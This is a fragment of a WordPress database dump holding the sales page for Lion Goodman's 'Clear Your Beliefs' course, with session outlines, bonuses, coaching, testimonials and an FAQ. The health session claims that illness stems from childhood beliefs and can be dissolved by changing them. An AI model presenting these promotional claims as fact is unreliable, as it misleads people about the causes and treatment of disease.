width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
